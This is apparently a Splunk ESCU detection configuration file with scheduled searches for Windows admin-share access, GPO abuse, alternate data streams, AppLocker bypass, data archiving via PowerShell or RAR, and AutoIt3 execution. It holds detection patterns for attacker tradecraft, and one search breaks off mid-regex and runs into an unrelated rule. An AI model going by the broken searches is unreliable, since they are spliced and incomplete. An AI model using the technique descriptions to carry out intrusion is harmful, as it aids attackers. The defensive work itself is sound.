action.notable.param.rule_title = Windows Administrative Shares Accessed On Multiple Hosts action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=5140 OR EventCode=5145 (ShareName="\\\\*\\ADMIN$" OR ShareName="\\\\*\\IPC$" OR ShareName="\\\\*\\C$") | bucket span=5m _time | stats dc(Computer) AS unique_targets values(Computer) as host_targets values(ShareName) as shares by _time, IpAddress, SubjectUserName, EventCode | where unique_targets > 30 | `windows_administrative_shares_accessed_on_multiple_hosts_filter` [ESCU - Windows Admon Default Group Policy Object Modified - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic leverages Splunk's Admon to identify the modification of a default Group Policy Object. A fresh installation of an Active Directory network will typically contain two default group policy objects, `Default Domain Controllers Policy` and `Default Domain Policy`. The default domain controllers policy is used to enforce and set policies on all the domain controllers within the domain environment. The default domain policy is linked to all users and computers by default. An adversary who has obtained privileged access to an Active Directory network may modify the default group policy objects to obtain further access, deploy persistence or execute malware across a large number of hosts. Security teams should monitor the modification of the default GPOs. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1484", "T1484.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic leverages Splunk's Admon to identify the modification of a default Group Policy Object. 
A fresh installation of an Active Directory network will typically contain two default group policy objects, `Default Domain Controllers Policy` and `Default Domain Policy`. The default domain controllers policy is used to enforce and set policies on all the domain controllers within the domain environment. The default domain policy is linked to all users and computers by default. An adversary who has obtained privileged access to an Active Directory network may modify the default group policy objects to obtain further access, deploy persistence or execute malware across a large number of hosts. Security teams should monitor the modification of the default GPOs. action.escu.how_to_implement = To successfully implement this search, you need to be monitoring Active Directory logs using Admon. Details can be found here https://docs.splunk.com/Documentation/SplunkCloud/8.1.2101/Data/MonitorActiveDirectory action.escu.known_false_positives = The default Group Policy Objects within an AD network may be legitimately updated for administrative operations, filter as needed. 
action.escu.creation_date = 2023-03-29 action.escu.modification_date = 2023-03-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Admon Default Group Policy Object Modified - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Active Directory Privilege Escalation", "Sneaky Active Directory Persistence Tricks"] action.risk = 1 action.risk.param._risk_message = A default domain group policy was updated on $dcName$ action.risk.param._risk = [{"risk_object_field": "dcName", "risk_object_type": "system", "risk_score": 50}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Admon Default Group Policy Object Modified - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Privilege Escalation", "Sneaky Active Directory Persistence Tricks"], "cis20": ["CIS 10"], "confidence": 50, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1484", "T1484.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic leverages Splunk's Admon to identify the modification of a default Group Policy Object. A fresh installation of an Active Directory network will typically contain two default group policy objects, `Default Domain Controllers Policy` and `Default Domain Policy`. The default domain controllers policy is used to enforce and set policies on all the domain controllers within the domain environment. The default domain policy is linked to all users and computers by default. 
An adversary who has obtained privileged access to an Active Directory network may modify the default group policy objects to obtain further access, deploy persistence or execute malware across a large number of hosts. Security teams should monitor the modification of the default GPOs. action.notable.param.rule_title = Windows Admon Default Group Policy Object Modified action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `admon` admonEventType=Update objectCategory="CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=*" (displayName="Default Domain Policy" OR displayName="Default Domain Controllers Policy") | stats min(_time) as firstTime max(_time) as lastTime values(gPCFileSysPath) by dcName, displayName | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_admon_default_group_policy_object_modified_filter` [ESCU - Windows Admon Group Policy Object Created - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic leverages Splunk's Admon to identify the creation of a new Group Policy Object. With GPOs, system administrators can manage and configure applications, software operations, and user settings throughout an entire organization. GPOs can be abused and leveraged by adversaries to escalate privileges or deploy malware across an Active Directory network. As an example, the LockBit ransomware will create new group policies on the domain controller that are then pushed out to every device on the network. Security teams should monitor the creation of new Group Policy Objects. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1484", "T1484.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic leverages Splunk's Admon to identify the creation of a new Group Policy Object. With GPOs, system administrators can manage and configure applications, software operations, and user settings throughout an entire organization. GPOs can be abused and leveraged by adversaries to escalate privileges or deploy malware across an Active Directory network. As an example, the LockBit ransomware will create new group policies on the domain controller that are then pushed out to every device on the network. Security teams should monitor the creation of new Group Policy Objects. action.escu.how_to_implement = To successfully implement this search, you need to be monitoring Active Directory logs using Admon. Details can be found here https://docs.splunk.com/Documentation/SplunkCloud/8.1.2101/Data/MonitorActiveDirectory action.escu.known_false_positives = Group Policy Objects are created as part of regular administrative operations, filter as needed. 
action.escu.creation_date = 2023-04-06 action.escu.modification_date = 2023-04-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Admon Group Policy Object Created - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Active Directory Privilege Escalation", "Sneaky Active Directory Persistence Tricks"] action.risk = 1 action.risk.param._risk_message = A new group policy object was created on $dcName$ action.risk.param._risk = [{"risk_object_field": "dcName", "risk_object_type": "system", "risk_score": 50}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Admon Group Policy Object Created - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Privilege Escalation", "Sneaky Active Directory Persistence Tricks"], "cis20": ["CIS 10"], "confidence": 50, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1484", "T1484.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic leverages Splunk's Admon to identify the creation of a new Group Policy Object. With GPOs, system administrators can manage and configure applications, software operations, and user settings throughout an entire organization. GPOs can be abused and leveraged by adversaries to escalate privileges or deploy malware across an Active Directory network. As an example, the LockBit ransomware will create new group policies on the domain controller that are then pushed out to every device on the network. 
Security teams should monitor the creation of new Group Policy Objects. action.notable.param.rule_title = Windows Admon Group Policy Object Created action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `admon` admonEventType=Update objectCategory="CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=*" versionNumber=0 displayName!="New Group Policy Object" | stats min(_time) as firstTime max(_time) as lastTime values(gPCFileSysPath) by dcName, displayName | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_admon_group_policy_object_created_filter` [ESCU - Windows Alternate DataStream - Base64 Content - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic leverages Sysmon Event ID 15 (FileCreateStreamHash), which fires when a named file stream is created, to detect Alternate Data Streams (ADS) being written on Windows systems. ADS is a feature of the NTFS file system that allows data to be stored in additional named streams attached to a file. These streams are not shown in standard file listings (`dir /r` or PowerShell `Get-Item -Stream *` reveal them), making them a popular technique for concealing malicious activity. Event ID 15 records both the hash of the primary file content (the unnamed stream) and the contents of the named stream, which can hold executables, scripts, or configuration data. Browsers and mail clients use the same mechanism legitimately when they attach a Zone.Identifier stream to a download, marking the file as originating from the Internet (Mark of the Web, MOTW); malware uses ADS to hide payloads. This analytic identifies such misuse by analyzing the content and creation patterns of named streams, including those under 1KB which may contain MOTW information. 
It is important for detecting threats that use non-executable file types or hide scripts within ADS, beyond the traditional focus on PE executables. The detection monitors the creation of named streams, which can also be examined on the host with PowerShell (`Get-Item -Stream *`, `Get-Content -Stream Zone.Identifier`) for additional streams or MOTW information. This helps uncover hidden payloads and trace the origin of suspicious files downloaded via browsers or email clients. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1564", "T1564.004"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic leverages Sysmon Event ID 15 (FileCreateStreamHash), which fires when a named file stream is created, to detect Alternate Data Streams (ADS) being written on Windows systems. ADS is a feature of the NTFS file system that allows data to be stored in additional named streams attached to a file. These streams are not shown in standard file listings (`dir /r` or PowerShell `Get-Item -Stream *` reveal them), making them a popular technique for concealing malicious activity. Event ID 15 records both the hash of the primary file content (the unnamed stream) and the contents of the named stream, which can hold executables, scripts, or configuration data. Browsers and mail clients use the same mechanism legitimately when they attach a Zone.Identifier stream to a download, marking the file as originating from the Internet (Mark of the Web, MOTW); malware uses ADS to hide payloads. This analytic identifies such misuse by analyzing the content and creation patterns of named streams, including those under 1KB which may contain MOTW information. It is important for detecting threats that use non-executable file types or hide scripts within ADS, beyond the traditional focus on PE executables. 
The detection process involves monitoring for the creation of named streams, which are part of the NTFS structure and can be examined using tools like PowerShell for the presence of additional data streams or MOTW information. This approach helps in uncovering hidden payloads and tracking the origin of suspicious files downloaded via browsers or email clients, providing a comprehensive defense against ADS abuse. action.escu.how_to_implement = Target environment must ingest sysmon data, specifically Event ID 15. action.escu.known_false_positives = Unknown action.escu.creation_date = 2024-02-15 action.escu.modification_date = 2024-02-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Alternate DataStream - Base64 Content - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Windows Defense Evasion Tactics"] action.risk = 1 action.risk.param._risk_message = Base64 content written to an NTFS alternate data stream by $user$, see command field for details. 
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "user", "risk_object_type": "other", "risk_score": 80}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Alternate DataStream - Base64 Content - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics"], "cis20": ["CIS 10"], "confidence": 80, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1564", "T1564.004"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic leverages Sysmon Event ID 15, a critical file creation event, to detect the creation of Alternate Data Streams (ADS) on Windows systems. ADS is a feature of the NTFS file system that allows the storage of data in hidden streams attached to files. These streams are not visible in standard file listings, making them a popular technique for concealing malicious activity. Event ID 15 captures both the hash of the primary file content (unnamed stream) and the content of any additional named streams, which can include executables, scripts, or configuration data. Malware often exploits ADS to hide payloads, leveraging browser downloads to attach a Zone.Identifier stream, marking the file as originating from the Internet (Mark Of The Web, MOTW). This analytic is designed to identify such misuse by analyzing the content and creation patterns of named streams, including those under 1KB which may contain MOTW information. It is essential for detecting sophisticated threats that utilize non-executable file types or conceal malicious scripts within ADS, beyond the traditional focus on PE executables. The detection process involves monitoring for the creation of named streams, which are part of the NTFS structure and can be examined using tools like PowerShell for the presence of additional data streams or MOTW information. This approach helps in uncovering hidden payloads and tracking the origin of suspicious files downloaded via browsers or email clients, providing a comprehensive defense against ADS abuse.
action.notable.param.rule_title = Windows Alternate DataStream - Base64 Content
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `sysmon` EventCode=15 NOT Contents IN ("-","[ZoneTransfer]*") | regex TargetFilename="(? upperBound, "Yes", "No") | where anomaly="Yes" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_applocker_execution_from_uncommon_locations_filter`

[ESCU - Windows AppLocker Privilege Escalation via Unauthorized Bypass - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic utilizes Windows AppLocker event logs to identify attempts to bypass application restrictions. AppLocker is a feature that allows administrators to specify which applications are permitted to run on a system. This analytic is designed to identify attempts to bypass these restrictions, which could be indicative of an attacker attempting to escalate privileges. The analytic uses EventCodes 8007, 8004, 8022, 8025, 8029, and 8040 to identify these attempts. The analytic will identify the host, full file path, and target user associated with the bypass attempt. These EventCodes are related to block events and focus on 5 attempts or more.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic utilizes Windows AppLocker event logs to identify attempts to bypass application restrictions. AppLocker is a feature that allows administrators to specify which applications are permitted to run on a system. This analytic is designed to identify attempts to bypass these restrictions, which could be indicative of an attacker attempting to escalate privileges. The analytic uses EventCodes 8007, 8004, 8022, 8025, 8029, and 8040 to identify these attempts. The analytic will identify the host, full file path, and target user associated with the bypass attempt. These EventCodes are related to block events and focus on 5 attempts or more.
action.escu.how_to_implement = The analytic is designed to be run against Windows AppLocker event logs collected from endpoints with AppLocker enabled. If using Microsoft Defender for Endpoint (MDE), modify the analytic to use EventTypes/ActionTypes that match the block events for AppLocker. The analytic requires the AppLocker event logs to be ingested into Splunk.
action.escu.known_false_positives = False positives are possible if legitimate users are attempting to bypass application restrictions. This could occur if a user is attempting to run an application that is not permitted by AppLocker. It is recommended to investigate the context of the bypass attempt to determine if it is malicious or not. Modify the threshold as needed to reduce false positives.
action.escu.creation_date = 2024-03-21
action.escu.modification_date = 2024-03-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows AppLocker Privilege Escalation via Unauthorized Bypass - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Windows AppLocker"]
action.risk = 1
action.risk.param._risk_message = An attempt to bypass application restrictions was detected on a host $dest$.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows AppLocker Privilege Escalation via Unauthorized Bypass - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows AppLocker"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic utilizes Windows AppLocker event logs to identify attempts to bypass application restrictions. AppLocker is a feature that allows administrators to specify which applications are permitted to run on a system. This analytic is designed to identify attempts to bypass these restrictions, which could be indicative of an attacker attempting to escalate privileges. The analytic uses EventCodes 8007, 8004, 8022, 8025, 8029, and 8040 to identify these attempts. The analytic will identify the host, full file path, and target user associated with the bypass attempt. These EventCodes are related to block events and focus on 5 attempts or more.
action.notable.param.rule_title = Windows AppLocker Privilege Escalation via Unauthorized Bypass
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `applocker` EventCode IN (8007, 8004, 8022, 8025, 8029, 8040) | spath input=UserData_Xml | rename RuleAndFileData.* as *, Computer as dest, TargetUser AS user | lookup applockereventcodes EventCode OUTPUT Description | stats count AS attempt_count min(_time) as firstTime max(_time) as lastTime by dest, PolicyName, RuleId, user, TargetProcessId, FilePath, FullFilePath | where attempt_count > 5 | sort - attempt_count | `windows_applocker_privilege_escalation_via_unauthorized_bypass_filter`

[ESCU - Windows AppLocker Rare Application Launch Detection - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic is designed to detect the launch of applications that occur rarely within the environment, which could indicate the use of potentially malicious software or tools by attackers. It works by aggregating the count of application launches over time, then calculating the average and standard deviation of these counts. Applications whose launch counts significantly deviate from the norm, either by exceeding or falling below three standard deviations from the average, are flagged for further investigation. This approach helps in identifying unusual application activity that could be indicative of a security threat.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This analytic is designed to detect the launch of applications that occur rarely within the environment, which could indicate the use of potentially malicious software or tools by attackers. It works by aggregating the count of application launches over time, then calculating the average and standard deviation of these counts. Applications whose launch counts significantly deviate from the norm, either by exceeding or falling below three standard deviations from the average, are flagged for further investigation. This approach helps in identifying unusual application activity that could be indicative of a security threat.
action.escu.how_to_implement = The analytic is designed to be run against Windows AppLocker event logs collected from endpoints with AppLocker enabled. If using Microsoft Defender for Endpoint (MDE), modify the analytic to use EventTypes/ActionTypes that match the block events for AppLocker. The analytic requires the AppLocker event logs to be ingested into Splunk. Note that an additional method to reduce false positives would be to add the specific EventCodes (8003 or 8004) and filter from there.
action.escu.known_false_positives = False positives are possible if legitimate users are launching applications that are not permitted by AppLocker. It is recommended to investigate the context of the application launch to determine if it is malicious or not. Modify the threshold as needed to reduce false positives.
action.escu.creation_date = 2024-03-21
action.escu.modification_date = 2024-03-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows AppLocker Rare Application Launch Detection - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Windows AppLocker"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows AppLocker Rare Application Launch Detection - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows AppLocker"], "cis20": ["CIS 10"], "confidence": 30, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `applocker` | spath input=UserData_Xml | rename RuleAndFileData.* as *, Computer as dest, TargetUser AS user | stats dc(_time) as days, count by FullFilePath dest user | eventstats avg(count) as avg, stdev(count) as stdev | eval upperBound=(avg+stdev*3), lowerBound=(avg-stdev*3) | where count > upperBound OR count < lowerBound | `windows_applocker_rare_application_launch_detection_filter`

[ESCU - Windows Archive Collected Data via Powershell - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies suspicious PowerShell scripts that archive files to a temp folder. This anomaly detection serves as a valuable indicator to uncover threats from adversaries utilizing PowerShell scripts for data archiving purposes. Identifying this method becomes pivotal in flagging and investigating potential threats, enabling proactive measures against threat actors leveraging similar PowerShell-based data collection and archiving techniques.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1560"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies suspicious PowerShell scripts that archive files to a temp folder. This anomaly detection serves as a valuable indicator to uncover threats from adversaries utilizing PowerShell scripts for data archiving purposes. Identifying this method becomes pivotal in flagging and investigating potential threats, enabling proactive measures against threat actors leveraging similar PowerShell-based data collection and archiving techniques.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = PowerShell may use this function to archive data legitimately.
action.escu.creation_date = 2023-12-19
action.escu.modification_date = 2023-12-19
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Archive Collected Data via Powershell - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["CISA AA23-347A"]
action.risk = 1
action.risk.param._risk_message = Windows Archive Collected Data via Powershell on $dest$.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Archive Collected Data via Powershell - Rule
action.correlationsearch.annotations = {"analytic_story": ["CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1560"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 ScriptBlockText = "*Compress-Archive*" ScriptBlockText = "*\\Temp\\*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_archive_collected_data_via_powershell_filter`

[ESCU - Windows Archive Collected Data via Rar - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies a process executing the rar utility to archive files. This method has been exploited by various threat actors, including red-teamers and malware like DarkGate, to gather and compress collected data on compromised hosts. Subsequently, these archives are transmitted to command and control servers as part of their data exfiltration techniques. These adversaries leverage RAR archiving to consolidate and compress collected data on compromised hosts. Once the data is compiled into these archives, it serves as a means for these entities to effectively exfiltrate sensitive information. This process involves transferring the archived data to command and control servers, facilitating the extraction and retrieval of critical information from compromised systems.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1560.001", "T1560"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies a process executing the rar utility to archive files. This method has been exploited by various threat actors, including red-teamers and malware like DarkGate, to gather and compress collected data on compromised hosts. Subsequently, these archives are transmitted to command and control servers as part of their data exfiltration techniques. These adversaries leverage RAR archiving to consolidate and compress collected data on compromised hosts. Once the data is compiled into these archives, it serves as a means for these entities to effectively exfiltrate sensitive information. This process involves transferring the archived data to command and control servers, facilitating the extraction and retrieval of critical information from compromised systems.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Users and network administrators can execute this command.
action.escu.creation_date = 2023-11-23
action.escu.modification_date = 2023-11-23
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Archive Collected Data via Rar - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["DarkGate Malware"]
action.risk = 1
action.risk.param._risk_message = A Rar.exe command line was used to archive collected data on $dest$.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Archive Collected Data via Rar - Rule
action.correlationsearch.annotations = {"analytic_story": ["DarkGate Malware"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1560.001", "T1560"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="Rar.exe" OR Processes.original_file_name = "Rar.exe") AND Processes.process = "*a*" Processes.process = "* -ep1*" Processes.process = "* -r*" Processes.process = "* -y*" Processes.process = "* -v5m*" Processes.process = "* -m1*" by Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.process_guid Processes.parent_process_name Processes.parent_process Processes.parent_process_guid Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_archive_collected_data_via_rar_filter`

[ESCU - Windows AutoIt3 Execution - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic is designed to detect any execution of AutoIt3, a scripting language designed for automating the Windows GUI and general scripting. This includes instances where AutoIt3 has been renamed or otherwise altered in an attempt to evade detection. The analytic works by searching for process names or original file names that match 'autoit3.exe', which is the default executable for AutoIt scripts. This detection is important as AutoIt3 is often used by attackers to automate malicious activities, such as the execution of malware or other unwanted software. False positives may occur with legitimate uses of AutoIt3.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic is designed to detect any execution of AutoIt3, a scripting language designed for automating the Windows GUI and general scripting. This includes instances where AutoIt3 has been renamed or otherwise altered in an attempt to evade detection. The analytic works by searching for process names or original file names that match 'autoit3.exe', which is the default executable for AutoIt scripts. This detection is important as AutoIt3 is often used by attackers to automate malicious activities, such as the execution of malware or other unwanted software. False positives may occur with legitimate uses of AutoIt3.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = False positives may be present if the application is legitimately used; filter by user or endpoint as needed.
action.escu.creation_date = 2023-10-31
action.escu.modification_date = 2023-10-31
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows AutoIt3 Execution - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["DarkGate Malware"]
action.risk = 1
action.risk.param._risk_message = Execution of AutoIt3 detected. The source process is $parent_process_name$ and the destination process is $process_name$ on $dest$ by
action.risk.param._risk = [{"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 50}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 50}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 50}, {"risk_object_field": "user", "risk_object_type": "other", "risk_score": 50}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows AutoIt3 Execution - Rule
action.correlationsearch.annotations = {"analytic_story": ["DarkGate Malware"], "cis20": ["CIS 10"], "confidence": 100, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic is designed to detect any execution of AutoIt3, a scripting language designed for automating the Windows GUI and general scripting. This includes instances where AutoIt3 has been renamed or otherwise altered in an attempt to evade detection. The analytic works by searching for process names or original file names that match 'autoit3.exe', which is the default executable for AutoIt scripts. This detection is important as AutoIt3 is often used by attackers to automate malicious activities, such as the execution of malware or other unwanted software. False positives may occur with legitimate uses of AutoIt3.
action.notable.param.rule_title = Windows AutoIt3 Execution
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
